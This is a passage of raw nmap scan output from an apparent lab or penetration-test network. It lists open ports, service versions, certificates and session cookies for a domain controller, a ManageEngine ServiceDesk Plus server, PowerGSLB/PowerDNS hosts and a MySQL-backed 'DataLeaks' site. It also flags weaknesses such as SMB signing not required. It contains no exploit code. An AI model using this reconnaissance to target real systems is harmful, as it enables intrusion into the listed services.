  | ssl-cert: Subject: commonName=0x0security.com/organizationName=GiganticHosting CA/stateOrProvinceName=Stockholm/countryName=SE
  | Subject Alternative Name: DNS:0x0security.com, DNS:*.0x0security.com
  | Not valid before: 2024-07-16T15:39:00
  |_Not valid after:  2026-07-16T00:00:00
  5000/tcp open  http       Apache httpd 2.4.41 ((Unix))
  |_http-title: Gigantic Hosting | Home
  | http-methods: 
  |_  Potentially risky methods: TRACE
  |_http-server-header: Apache/2.4.41 (Unix)
  8000/tcp open  rtsp
  | fingerprint-strings: 
  |   FourOhFourRequest, GetRequest, HTTPOptions: 
  |     HTTP/1.0 404 Not Found
  |     Content-Type: text/html
  |     X-Frame-Options: DENY
  |     Content-Length: 179
  |     X-Content-Type-Options: nosniff
  |     <!doctype html>
  |     <html lang="en">
  |     <head>
  |     <title>Not Found</title>
  |     </head>
  |     <body>
  |     <h1>Not Found</h1><p>The requested resource was not found on this server.</p>
  |     </body>
  |     </html>
  |   RTSPRequest: 
  |     RTSP/1.0 404 Not Found
  |     Content-Type: text/html
  |     X-Frame-Options: DENY
  |     Content-Length: 179
  |     X-Content-Type-Options: nosniff
  |     <!doctype html>
  |     <html lang="en">
  |     <head>
  |     <title>Not Found</title>
  |     </head>
  |     <body>
  |     <h1>Not Found</h1><p>The requested resource was not found on this server.</p>
  |     </body>
  |     </html>
  |   SIPOptions: 
  |     SIP/2.0 404 Not Found
  |     Content-Type: text/html
  |     X-Frame-Options: DENY
  |     Content-Length: 179
  |     X-Content-Type-Options: nosniff
  |     <!doctype html>
  |     <html lang="en">
  |     <head>
  |     <title>Not Found</title>
  |     </head>
  |     <body>
  |     <h1>Not Found</h1><p>The requested resource was not found on this server.</p>
  |     </body>
  |_    </html>
  |_http-title: Not Found
  |_rtsp-methods: ERROR: Script execution failed (use -d to debug)
  8080/tcp open  ssl/http   Python BaseHTTPServer http.server 2 or 3.0 - 3.1
  |_http-server-header: PowerGSLB/1.7.3 Python/2.7.5
  | ssl-cert: Subject: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--
  | Not valid before: 2020-01-09T12:45:01
  |_Not valid after:  2021-01-08T12:45:01
  |_http-title: Error response
  9100/tcp open  jetdirect?
  1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
  SF-Port8000-TCP:V=7.95%I=7%D=4/7%Time=67F418F6%P=x86_64-alpine-linux-musl%
  SF:r(GetRequest,133,"HTTP/1\.0\x20404\x20Not\x20Found\r\nContent-Type:\x20
  SF:text/html\r\nX-Frame-Options:\x20DENY\r\nContent-Length:\x20179\r\nX-Co
  SF:ntent-Type-Options:\x20nosniff\r\n\r\n\n<!doctype\x20html>\n<html\x20la
  SF:ng=\"en\">\n<head>\n\x20\x20<title>Not\x20Found</title>\n</head>\n<body
  SF:>\n\x20\x20<h1>Not\x20Found</h1><p>The\x20requested\x20resource\x20was\
  SF:x20not\x20found\x20on\x20this\x20server\.</p>\n</body>\n</html>\n")%r(F
  SF:ourOhFourRequest,133,"HTTP/1\.0\x20404\x20Not\x20Found\r\nContent-Type:
  SF:\x20text/html\r\nX-Frame-Options:\x20DENY\r\nContent-Length:\x20179\r\n
  SF:X-Content-Type-Options:\x20nosniff\r\n\r\n\n<!doctype\x20html>\n<html\x
  SF:20lang=\"en\">\n<head>\n\x20\x20<title>Not\x20Found</title>\n</head>\n<
  SF:body>\n\x20\x20<h1>Not\x20Found</h1><p>The\x20requested\x20resource\x20
  SF:was\x20not\x20found\x20on\x20this\x20server\.</p>\n</body>\n</html>\n")
  SF:%r(HTTPOptions,133,"HTTP/1\.0\x20404\x20Not\x20Found\r\nContent-Type:\x
  SF:20text/html\r\nX-Frame-Options:\x20DENY\r\nContent-Length:\x20179\r\nX-
  SF:Content-Type-Options:\x20nosniff\r\n\r\n\n<!doctype\x20html>\n<html\x20
  SF:lang=\"en\">\n<head>\n\x20\x20<title>Not\x20Found</title>\n</head>\n<bo
  SF:dy>\n\x20\x20<h1>Not\x20Found</h1><p>The\x20requested\x20resource\x20wa
  SF:s\x20not\x20found\x20on\x20this\x20server\.</p>\n</body>\n</html>\n")%r
  SF:(RTSPRequest,133,"RTSP/1\.0\x20404\x20Not\x20Found\r\nContent-Type:\x20
  SF:text/html\r\nX-Frame-Options:\x20DENY\r\nContent-Length:\x20179\r\nX-Co
  SF:ntent-Type-Options:\x20nosniff\r\n\r\n\n<!doctype\x20html>\n<html\x20la
  SF:ng=\"en\">\n<head>\n\x20\x20<title>Not\x20Found</title>\n</head>\n<body
  SF:>\n\x20\x20<h1>Not\x20Found</h1><p>The\x20requested\x20resource\x20was\
  SF:x20not\x20found\x20on\x20this\x20server\.</p>\n</body>\n</html>\n")%r(S
  SF:IPOptions,132,"SIP/2\.0\x20404\x20Not\x20Found\r\nContent-Type:\x20text
  SF:/html\r\nX-Frame-Options:\x20DENY\r\nContent-Length:\x20179\r\nX-Conten
  SF:t-Type-Options:\x20nosniff\r\n\r\n\n<!doctype\x20html>\n<html\x20lang=\
  SF:"en\">\n<head>\n\x20\x20<title>Not\x20Found</title>\n</head>\n<body>\n\
  SF:x20\x20<h1>Not\x20Found</h1><p>The\x20requested\x20resource\x20was\x20n
  SF:ot\x20found\x20on\x20this\x20server\.</p>\n</body>\n</html>\n");
  Service Info: Host:  nextcloud; OS: Linux; CPE: cpe:/o:linux:linux_kernel
  
  Nmap scan report for 192.168.21.123
  Host is up (0.0013s latency).
  Not shown: 65532 filtered tcp ports (no-response)
  PORT     STATE SERVICE       VERSION
  443/tcp  open  ssl/https     -
  |_http-title: ManageEngine ServiceDesk Plus 
  |_http-server-header: - 
  | http-methods: 
  |_ Potentially risky methods:
  | fingerprint-strings: 
  |   FourOhFourRequest: 
  |     HTTP/1.1 404 
  |     Set-Cookie: SDPSESSIONID=AC313B8BA98AEE540B776E38B700DCF6; Path=/; Secure; HttpOnly
  |     Content-Type: text/html;charset=UTF-8
  |     Vary: Accept-Encoding
  |     Date: Tue, 08 Apr 2025 01:24:55 GMT
  |     Connection: close
  |     Server: -
  |     <!DOCTYPE html>
  |     <html>
  |     <head>
  |     <meta http-equiv="X-UA-Compatible" content="IE=Edge">
  |     <script>var isMSP = false; </script>
  |     <!-- CWF START -->
  |     <script type="text/javascript" src="/scripts/ClientLogger.js?11106"></script>
  |     <script>
  |     curLevStr = 'null';
  |     //Level.INFO is stored as default..
  |     curLev = 800;
  |     levelVals = [{NAME:"FINEST",VALUE:300},{NAME:"FINER",VALUE:400},{NAME:"FINE",VALUE:500},{NAME:"CONFIG",VALUE:700},{NAME:"INFO",VALUE:800},{NAME:"WARNING",VALUE:900},{NAME:"SEVERE",VALUE:1000},{NAME:"ALL",VALUE:1200}];//no i18n
  |     levelVals.length;
  |     Level = {FINEST:"300",FINER:"400",FINE:"500",CONFIG:"700
  |   GetRequest: 
  |     HTTP/1.1 200 
  |     Set-Cookie: SDPSESSIONID=43082E9C37B80EF6DAA69DC23AAD43BC; Path=/; Secure; HttpOnly
  |     Cache-Control: no-cache, no-store
  |     Expires: Thu, 01 Jan 1970 00:00:00 GMT
  |     Pragma: no-cache
  |     X-Content-Type-Options: nosniff
  |     X-XSS-Protection: 1;mode=block
  |     Content-Type: text/html;charset=UTF-8
  |     Vary: Accept-Encoding
  |     Date: Tue, 08 Apr 2025 01:24:55 GMT
  |     Connection: close
  |     Server: -
  |     <!DOCTYPE html>
  |     <html>
  |     <head>
  |     <meta http-equiv="X-UA-Compatible" content="IE=Edge">
  |     <!--SD-67048 : client-encoder.js and associated files were included as part of XSS fixes. -->
  |     <script>
  |     enableEncoding = true;
  |     'null' == "false" || 'null' == "no" )
  |     enableEncoding = false;
  |     </script>
  |     <script language='JavaScript' type="text/javascript" src='/scripts/jquery-2.2.4.min.js'></script>
  |     <!--jquery-extension.js is used to override the extend method pr
  |   HTTPOptions: 
  |     HTTP/1.1 405 
  |     Set-Cookie: SDPSESSIONID=5630EB91549BFAFE598B843986DBD12E; Path=/; Secure; HttpOnly
  |     Allow: 
  |     Content-Type: text/plain
  |     Content-Length: 0
  |     Date: Tue, 08 Apr 2025 01:24:55 GMT
  |     Connection: close
  |_    Server: -
  |_http-title: ManageEngine ServiceDesk Plus
  |_http-server-header: -
  | http-methods: 
  |_  Potentially risky methods: 
  |_ssl-date: 2025-04-08T01:28:16+00:00; +6h57m47s from scanner time.
  | ssl-cert: Subject: commonName=SERVICEDESK/organizationName=Zoho Corporation/stateOrProvinceName=CA/countryName=US
  | Not valid before: 2020-03-12T21:14:09
  |_Not valid after:  2120-02-17T21:14:09
  445/tcp  open  microsoft-ds?
  5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
  |_http-server-header: Microsoft-HTTPAPI/2.0
  |_http-title: Not Found
  1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
  SF-Port443-TCP:V=7.95%T=SSL%I=7%D=4/7%Time=67F418FD%P=x86_64-alpine-linux-
  SF:musl%r(GetRequest,25E6,"HTTP/1\.1\x20200\x20\r\nSet-Cookie:\x20SDPSESSI
  SF:ONID=43082E9C37B80EF6DAA69DC23AAD43BC;\x20Path=/;\x20Secure;\x20HttpOnl
  SF:y\r\nCache-Control:\x20no-cache,\x20no-store\r\nExpires:\x20Thu,\x2001\
  SF:x20Jan\x201970\x2000:00:00\x20GMT\r\nPragma:\x20no-cache\r\nX-Content-T
  SF:ype-Options:\x20nosniff\r\nX-XSS-Protection:\x201;mode=block\r\nContent
  SF:-Type:\x20text/html;charset=UTF-8\r\nVary:\x20Accept-Encoding\r\nDate:\
  SF:x20Tue,\x2008\x20Apr\x202025\x2001:24:55\x20GMT\r\nConnection:\x20close
  SF:\r\nServer:\x20-\r\n\r\n<!DOCTYPE\x20html>\n<html>\n<head>\n<meta\x20ht
  SF:tp-equiv=\"X-UA-Compatible\"\x20content=\"IE=Edge\">\n\n\n\n\r\n\n\n<!-
  SF:-SD-67048\x20:\x20client-encoder\.js\x20and\x20associated\x20files\x20w
  SF:ere\x20included\x20as\x20part\x20of\x20XSS\x20fixes\.\x20-->\n\x20\x20\
  SF:x20\x20<script>\n\x20\x20\x20\x20var\x20enableEncoding\x20=\x20true;\n\
  SF:x20\x20\x20\x20if\(\x20'null'\x20==\x20\"false\"\x20\|\|\x20'null'\x20=
  SF:=\x20\"no\"\x20\)\n\x20\x20\x20\x20{\n\x20\x20enableEncoding\x20=\x20fa
  SF:lse;\n\x20\x20\x20\x20}\n\x20\x20\x20\x20</script>\n\n\x20\x20\x20\x20\
  SF:n\x20\x20\x20\x20\x20\x20\x20\x20<script\x20language='JavaScript'\x20ty
  SF:pe=\"text/javascript\"\x20src='/scripts/jquery-2\.2\.4\.min\.js'></scri
  SF:pt>\n\x20\x20\x20\x20\x20\x20\x20\x20<!--jquery-extension\.js\x20is\x20
  SF:used\x20to\x20override\x20the\x20extend\x20method\x20pr")%r(HTTPOptions
  SF:,DF,"HTTP/1\.1\x20405\x20\r\nSet-Cookie:\x20SDPSESSIONID=5630EB91549BFA
  SF:FE598B843986DBD12E;\x20Path=/;\x20Secure;\x20HttpOnly\r\nAllow:\x20\r\n
  SF:Content-Type:\x20text/plain\r\nContent-Length:\x200\r\nDate:\x20Tue,\x2
  SF:008\x20Apr\x202025\x2001:24:55\x20GMT\r\nConnection:\x20close\r\nServer
  SF::\x20-\r\n\r\n")%r(FourOhFourRequest,2595,"HTTP/1\.1\x20404\x20\r\nSet-
  SF:Cookie:\x20SDPSESSIONID=AC313B8BA98AEE540B776E38B700DCF6;\x20Path=/;\x2
  SF:0Secure;\x20HttpOnly\r\nContent-Type:\x20text/html;charset=UTF-8\r\nVar
  SF:y:\x20Accept-Encoding\r\nDate:\x20Tue,\x2008\x20Apr\x202025\x2001:24:55
  SF:\x20GMT\r\nConnection:\x20close\r\nServer:\x20-\r\n\r\n\n\n<!DOCTYPE\x2
  SF:0html>\n<html>\n<head>\n<meta\x20http-equiv=\"X-UA-Compatible\"\x20cont
  SF:ent=\"IE=Edge\">\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\x20\x20\x20\x20\x20\x20\
  SF:x20\x20<script>var\x20isMSP\x20=\x20false;\x20</script>\n\x20\x20\x20\x
  SF:20\n\x20\x20\x20\x20<!--\x20CWF\x20START\x20-->\n\x20\x20\x20\x20\n\n\n
  SF:\n\n<script\x20type=\"text/javascript\"\x20src=\"/scripts/ClientLogger\
  SF:.js\?11106\"></script>\n\n<script>\nvar\x20curLevStr\x20=\x20'null';\n/
  SF:/Level\.INFO\x20is\x20stored\x20as\x20default\.\.\nvar\x20curLev\x20=\x
  SF:20800;\n\nvar\x20levelVals\x20=\x20\[{NAME:\"FINEST\",VALUE:300},{NAME:
  SF:\"FINER\",VALUE:400},{NAME:\"FINE\",VALUE:500},{NAME:\"CONFIG\",VALUE:7
  SF:00},{NAME:\"INFO\",VALUE:800},{NAME:\"WARNING\",VALUE:900},{NAME:\"SEVE
  SF:RE\",VALUE:1000},{NAME:\"ALL\",VALUE:1200}\];//no\x20i18n\nvar\x20len\x
  SF:20=\x20levelVals\.length;\n\nvar\x20Level\x20=\x20{FINEST:\"300\",FINER
  SF::\"400\",FINE:\"500\",CONFIG:\"700");
  Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
  
  Host script results:
  | smb2-security-mode: 
  |   3:1:1: 
  |_    Message signing enabled but not required
  |_clock-skew: mean: 6h57m46s, deviation: 0s, median: 6h57m46s
  | smb2-time: 
  |   date: 2025-04-08T01:27:48
  |_  start_date: N/A
  
  Nmap scan report for 192.168.20.10
  Host is up (0.00067s latency).
  Not shown: 65515 filtered tcp ports (no-response)
  PORT      STATE SERVICE       VERSION
  53/tcp    open  domain        Simple DNS Plus
  88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-04-08 01:24:49Z)
  135/tcp   open  msrpc         Microsoft Windows RPC
  139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
  389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: 0x0security.local0., Site: Default-First-Site-Name)
  445/tcp   open  microsoft-ds?
  464/tcp   open  kpasswd5?
  593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
  636/tcp   open  tcpwrapped
  3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: 0x0security.local0., Site: Default-First-Site-Name)
  3269/tcp  open  tcpwrapped
  5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
  |_http-server-header: Microsoft-HTTPAPI/2.0
  |_http-title: Not Found
  9389/tcp  open  mc-nmf        .NET Message Framing
  49666/tcp open  msrpc         Microsoft Windows RPC
  49668/tcp open  msrpc         Microsoft Windows RPC
  49669/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
  49670/tcp open  msrpc         Microsoft Windows RPC
  49680/tcp open  msrpc         Microsoft Windows RPC
  49687/tcp open  msrpc         Microsoft Windows RPC
  49703/tcp open  msrpc         Microsoft Windows RPC
  Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows
  
  Host script results:
  |_nbstat: NetBIOS name: DC, NetBIOS user: <unknown>, NetBIOS MAC: 00:50:56:b0:ea:cd (VMware)
  |_clock-skew: 6h57m45s
  | smb2-time: 
  |   date: 2025-04-08T01:27:33
  |_  start_date: N/A
  | smb2-security-mode: 
  |   3:1:1: 
  |_    Message signing enabled and required
  
  Nmap scan report for 172.17.0.1
  Host is up (0.00021s latency).
  Not shown: 65527 closed tcp ports (conn-refused)
  PORT     STATE SERVICE    VERSION
  22/tcp   open  ssh        OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)
  | ssh-hostkey: 
  |   256 02:ab:aa:01:64:de:c5:89:2f:75:e3:6a:a9:ff:78:ee (ECDSA)
  |_  256 9a:c2:d3:a0:fe:6a:ad:9a:4a:85:0d:c1:15:d1:13:be (ED25519)
  25/tcp   open  smtp       Postfix smtpd
  |_smtp-commands: nextcloud, PIPELINING, SIZE 10240000, VRFY, ETRN, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8, CHUNKING
  53/tcp   open  domain     PowerDNS Authoritative Server 4.1.11
  | dns-nsid: 
  |   NSID: powergslb (706f77657267736c62)
  |   id.server: powergslb
  |_  bind.version: PowerDNS Authoritative Server 4.1.11
  443/tcp  open  ssl/http   Apache httpd 2.4.52 ((Ubuntu))
  |_http-server-header: Apache/2.4.52 (Ubuntu)
  | tls-alpn: 
  |_  http/1.1
  | ssl-cert: Subject: commonName=0x0security.com/organizationName=GiganticHosting CA/stateOrProvinceName=Stockholm/countryName=SE
  | Subject Alternative Name: DNS:0x0security.com, DNS:*.0x0security.com
  | Not valid before: 2024-07-16T15:39:00
  |_Not valid after:  2026-07-16T00:00:00
  |_http-title: Promote Business Category Bootstrap Responsive Web Template | ...
  |_ssl-date: TLS randomness does not represent time
  5000/tcp open  http       Apache httpd 2.4.41 ((Unix))
  |_http-title: Gigantic Hosting | Home
  |_http-server-header: Apache/2.4.41 (Unix)
  | http-methods: 
  |_  Potentially risky methods: TRACE
  8000/tcp open  rtsp
  |_rtsp-methods: ERROR: Script execution failed (use -d to debug)
  | fingerprint-strings: 
  |   FourOhFourRequest, GetRequest, HTTPOptions: 
  |     HTTP/1.0 404 Not Found
  |     Content-Type: text/html
  |     X-Frame-Options: DENY
  |     Content-Length: 179
  |     X-Content-Type-Options: nosniff
  |     <!doctype html>
  |     <html lang="en">
  |     <head>
  |     <title>Not Found</title>
  |     </head>
  |     <body>
  |     <h1>Not Found</h1><p>The requested resource was not found on this server.</p>
  |     </body>
  |     </html>
  |   RTSPRequest: 
  |     RTSP/1.0 404 Not Found
  |     Content-Type: text/html
  |     X-Frame-Options: DENY
  |     Content-Length: 179
  |     X-Content-Type-Options: nosniff
  |     <!doctype html>
  |     <html lang="en">
  |     <head>
  |     <title>Not Found</title>
  |     </head>
  |     <body>
  |     <h1>Not Found</h1><p>The requested resource was not found on this server.</p>
  |     </body>
  |     </html>
  |   SIPOptions: 
  |     SIP/2.0 404 Not Found
  |     Content-Type: text/html
  |     X-Frame-Options: DENY
  |     Content-Length: 179
  |     X-Content-Type-Options: nosniff
  |     <!doctype html>
  |     <html lang="en">
  |     <head>
  |     <title>Not Found</title>
  |     </head>
  |     <body>
  |     <h1>Not Found</h1><p>The requested resource was not found on this server.</p>
  |     </body>
  |_    </html>
  |_http-title: Not Found
  8080/tcp open  ssl/http   Python BaseHTTPServer http.server 2 or 3.0 - 3.1
  |_http-title: Error response
  | ssl-cert: Subject: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--
  | Not valid before: 2020-01-09T12:45:01
  |_Not valid after:  2021-01-08T12:45:01
  |_http-server-header: PowerGSLB/1.7.3 Python/2.7.5
  9100/tcp open  jetdirect?
  1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
  SF-Port8000-TCP:V=7.95%I=7%D=4/7%Time=67F41902%P=x86_64-alpine-linux-musl%
  SF:r(GetRequest,133,"HTTP/1\.0\x20404\x20Not\x20Found\r\nContent-Type:\x20
  SF:text/html\r\nX-Frame-Options:\x20DENY\r\nContent-Length:\x20179\r\nX-Co
  SF:ntent-Type-Options:\x20nosniff\r\n\r\n\n<!doctype\x20html>\n<html\x20la
  SF:ng=\"en\">\n<head>\n\x20\x20<title>Not\x20Found</title>\n</head>\n<body
  SF:>\n\x20\x20<h1>Not\x20Found</h1><p>The\x20requested\x20resource\x20was\
  SF:x20not\x20found\x20on\x20this\x20server\.</p>\n</body>\n</html>\n")%r(F
  SF:ourOhFourRequest,133,"HTTP/1\.0\x20404\x20Not\x20Found\r\nContent-Type:
  SF:\x20text/html\r\nX-Frame-Options:\x20DENY\r\nContent-Length:\x20179\r\n
  SF:X-Content-Type-Options:\x20nosniff\r\n\r\n\n<!doctype\x20html>\n<html\x
  SF:20lang=\"en\">\n<head>\n\x20\x20<title>Not\x20Found</title>\n</head>\n<
  SF:body>\n\x20\x20<h1>Not\x20Found</h1><p>The\x20requested\x20resource\x20
  SF:was\x20not\x20found\x20on\x20this\x20server\.</p>\n</body>\n</html>\n")
  SF:%r(HTTPOptions,133,"HTTP/1\.0\x20404\x20Not\x20Found\r\nContent-Type:\x
  SF:20text/html\r\nX-Frame-Options:\x20DENY\r\nContent-Length:\x20179\r\nX-
  SF:Content-Type-Options:\x20nosniff\r\n\r\n\n<!doctype\x20html>\n<html\x20
  SF:lang=\"en\">\n<head>\n\x20\x20<title>Not\x20Found</title>\n</head>\n<bo
  SF:dy>\n\x20\x20<h1>Not\x20Found</h1><p>The\x20requested\x20resource\x20wa
  SF:s\x20not\x20found\x20on\x20this\x20server\.</p>\n</body>\n</html>\n")%r
  SF:(RTSPRequest,133,"RTSP/1\.0\x20404\x20Not\x20Found\r\nContent-Type:\x20
  SF:text/html\r\nX-Frame-Options:\x20DENY\r\nContent-Length:\x20179\r\nX-Co
  SF:ntent-Type-Options:\x20nosniff\r\n\r\n\n<!doctype\x20html>\n<html\x20la
  SF:ng=\"en\">\n<head>\n\x20\x20<title>Not\x20Found</title>\n</head>\n<body
  SF:>\n\x20\x20<h1>Not\x20Found</h1><p>The\x20requested\x20resource\x20was\
  SF:x20not\x20found\x20on\x20this\x20server\.</p>\n</body>\n</html>\n")%r(S
  SF:IPOptions,132,"SIP/2\.0\x20404\x20Not\x20Found\r\nContent-Type:\x20text
  SF:/html\r\nX-Frame-Options:\x20DENY\r\nContent-Length:\x20179\r\nX-Conten
  SF:t-Type-Options:\x20nosniff\r\n\r\n\n<!doctype\x20html>\n<html\x20lang=\
  SF:"en\">\n<head>\n\x20\x20<title>Not\x20Found</title>\n</head>\n<body>\n\
  SF:x20\x20<h1>Not\x20Found</h1><p>The\x20requested\x20resource\x20was\x20n
  SF:ot\x20found\x20on\x20this\x20server\.</p>\n</body>\n</html>\n");
  Service Info: Host:  nextcloud; OS: Linux; CPE: cpe:/o:linux:linux_kernel
  
  Nmap scan report for 172.17.0.2
  Host is up (0.00028s latency).
  Not shown: 65533 closed tcp ports (conn-refused)
  PORT    STATE SERVICE  VERSION
  53/tcp  open  domain   PowerDNS Authoritative Server 4.1.11
  | dns-nsid: 
  |   NSID: powergslb (706f77657267736c62)
  |   id.server: powergslb
  |_  bind.version: PowerDNS Authoritative Server 4.1.11
  443/tcp open  ssl/http Python BaseHTTPServer http.server 2 or 3.0 - 3.1
  |_http-title: Error response
  | ssl-cert: Subject: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--
  | Not valid before: 2020-01-09T12:45:01
  |_Not valid after:  2021-01-08T12:45:01
  |_http-server-header: PowerGSLB/1.7.3 Python/2.7.5
  
  Nmap scan report for 172.17.0.3
  Host is up (0.000091s latency).
  Not shown: 65534 closed tcp ports (conn-refused)
  PORT     STATE SERVICE VERSION
  8000/tcp open  rtsp
  |_rtsp-methods: ERROR: Script execution failed (use -d to debug)
  | fingerprint-strings: 
  |   FourOhFourRequest, GetRequest, HTTPOptions: 
  |     HTTP/1.0 404 Not Found
  |     Content-Type: text/html
  |     X-Frame-Options: DENY
  |     Content-Length: 179
  |     X-Content-Type-Options: nosniff
  |     <!doctype html>
  |     <html lang="en">
  |     <head>
  |     <title>Not Found</title>
  |     </head>
  |     <body>
  |     <h1>Not Found</h1><p>The requested resource was not found on this server.</p>
  |     </body>
  |     </html>
  |   RTSPRequest: 
  |     RTSP/1.0 404 Not Found
  |     Content-Type: text/html
  |     X-Frame-Options: DENY
  |     Content-Length: 179
  |     X-Content-Type-Options: nosniff
  |     <!doctype html>
  |     <html lang="en">
  |     <head>
  |     <title>Not Found</title>
  |     </head>
  |     <body>
  |     <h1>Not Found</h1><p>The requested resource was not found on this server.</p>
  |     </body>
  |     </html>
  |   SIPOptions: 
  |     SIP/2.0 404 Not Found
  |     Content-Type: text/html
  |     X-Frame-Options: DENY
  |     Content-Length: 179
  |     X-Content-Type-Options: nosniff
  |     <!doctype html>
  |     <html lang="en">
  |     <head>
  |     <title>Not Found</title>
  |     </head>
  |     <body>
  |     <h1>Not Found</h1><p>The requested resource was not found on this server.</p>
  |     </body>
  |_    </html>
  |_http-title: Not Found
  1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
  SF-Port8000-TCP:V=7.95%I=7%D=4/7%Time=67F41902%P=x86_64-alpine-linux-musl%
  SF:r(GetRequest,133,"HTTP/1\.0\x20404\x20Not\x20Found\r\nContent-Type:\x20
  SF:text/html\r\nX-Frame-Options:\x20DENY\r\nContent-Length:\x20179\r\nX-Co
  SF:ntent-Type-Options:\x20nosniff\r\n\r\n\n<!doctype\x20html>\n<html\x20la
  SF:ng=\"en\">\n<head>\n\x20\x20<title>Not\x20Found</title>\n</head>\n<body
  SF:>\n\x20\x20<h1>Not\x20Found</h1><p>The\x20requested\x20resource\x20was\
  SF:x20not\x20found\x20on\x20this\x20server\.</p>\n</body>\n</html>\n")%r(F
  SF:ourOhFourRequest,133,"HTTP/1\.0\x20404\x20Not\x20Found\r\nContent-Type:
  SF:\x20text/html\r\nX-Frame-Options:\x20DENY\r\nContent-Length:\x20179\r\n
  SF:X-Content-Type-Options:\x20nosniff\r\n\r\n\n<!doctype\x20html>\n<html\x
  SF:20lang=\"en\">\n<head>\n\x20\x20<title>Not\x20Found</title>\n</head>\n<
  SF:body>\n\x20\x20<h1>Not\x20Found</h1><p>The\x20requested\x20resource\x20
  SF:was\x20not\x20found\x20on\x20this\x20server\.</p>\n</body>\n</html>\n")
  SF:%r(HTTPOptions,133,"HTTP/1\.0\x20404\x20Not\x20Found\r\nContent-Type:\x
  SF:20text/html\r\nX-Frame-Options:\x20DENY\r\nContent-Length:\x20179\r\nX-
  SF:Content-Type-Options:\x20nosniff\r\n\r\n\n<!doctype\x20html>\n<html\x20
  SF:lang=\"en\">\n<head>\n\x20\x20<title>Not\x20Found</title>\n</head>\n<bo
  SF:dy>\n\x20\x20<h1>Not\x20Found</h1><p>The\x20requested\x20resource\x20wa
  SF:s\x20not\x20found\x20on\x20this\x20server\.</p>\n</body>\n</html>\n")%r
  SF:(RTSPRequest,133,"RTSP/1\.0\x20404\x20Not\x20Found\r\nContent-Type:\x20
  SF:text/html\r\nX-Frame-Options:\x20DENY\r\nContent-Length:\x20179\r\nX-Co
  SF:ntent-Type-Options:\x20nosniff\r\n\r\n\n<!doctype\x20html>\n<html\x20la
  SF:ng=\"en\">\n<head>\n\x20\x20<title>Not\x20Found</title>\n</head>\n<body
  SF:>\n\x20\x20<h1>Not\x20Found</h1><p>The\x20requested\x20resource\x20was\
  SF:x20not\x20found\x20on\x20this\x20server\.</p>\n</body>\n</html>\n")%r(S
  SF:IPOptions,132,"SIP/2\.0\x20404\x20Not\x20Found\r\nContent-Type:\x20text
  SF:/html\r\nX-Frame-Options:\x20DENY\r\nContent-Length:\x20179\r\nX-Conten
  SF:t-Type-Options:\x20nosniff\r\n\r\n\n<!doctype\x20html>\n<html\x20lang=\
  SF:"en\">\n<head>\n\x20\x20<title>Not\x20Found</title>\n</head>\n<body>\n\
  SF:x20\x20<h1>Not\x20Found</h1><p>The\x20requested\x20resource\x20was\x20n
  SF:ot\x20found\x20on\x20this\x20server\.</p>\n</body>\n</html>\n");
  
  Nmap scan report for 172.17.0.4
  Host is up (0.00053s latency).
  Not shown: 65533 closed tcp ports (conn-refused)
  PORT     STATE SERVICE VERSION
  80/tcp   open  http    Apache httpd 2.4.29 ((Ubuntu))
  |_http-title: DataLeaks
  | http-cookie-flags: 
  |   /: 
  |     PHPSESSID: 
  |_      httponly flag not set
  |_http-server-header: Apache/2.4.29 (Ubuntu)
  3306/tcp open  mysql?
  | mysql-info: 
  |   Protocol: 10
  |   Version: 5.7.26-0ubuntu0.18.04.1-log
  |   Thread ID: 254
  |   Capabilities flags: 63487
  |   Some Capabilities: SupportsTransactions, SupportsCompression, Support41Auth, Speaks41ProtocolOld, LongPassword, IgnoreSigpipes, InteractiveClient, LongColumnFlag, IgnoreSpaceBeforeParenthesis, DontAllowDatabaseTableColumn, ODBCClient, FoundRows, Speaks41ProtocolNew, SupportsLoadDataLocal, ConnectWithDatabase, SupportsMultipleResults, SupportsMultipleStatments, SupportsAuthPlugins
  |   Status: Autocommit
  |   Salt: qP\x0F!R/#\x18V\x0CV)7M\x12~_FU
  |_  Auth Plugin Name: mysql_native_password
  
  Nmap scan report for 172.17.0.5
  Host is up (0.00012s latency).
  Not shown: 65534 closed tcp ports (conn-refused)
  PORT   STATE SERVICE VERSION
  80/tcp open  http    Apache httpd 2.4.41 ((Unix))
  |_http-title: Gigantic Hosting | Home
  |_http-server-header: Apache/2.4.41 (Unix)
  | http-methods: 
  |_  Potentially risky methods: TRACE
  
  Nmap scan report for 172.17.0.6
  Host is up.
  All 65535 scanned ports on 172.17.0.6 are in ignored states.
  Not shown: 65535 filtered tcp ports (no-response)
  
  Post-scan script results:
  | ssh-hostkey: Possible duplicate hosts
  | Key 256 db:a6:6d:8b:e4:32:f3:57:1a:24:ef:6c:d6:15:ab:a9 (ED25519) used by:
  |   192.168.5.13
  |   192.168.5.21
  | Key 256 02:ab:aa:01:64:de:c5:89:2f:75:e3:6a:a9:ff:78:ee (ECDSA) used by:
  |   172.17.0.1
  |   192.168.20.31
  | Key 256 9a:c2:d3:a0:fe:6a:ad:9a:4a:85:0d:c1:15:d1:13:be (ED25519) used by:
  |   172.17.0.1
  |_  192.168.20.31
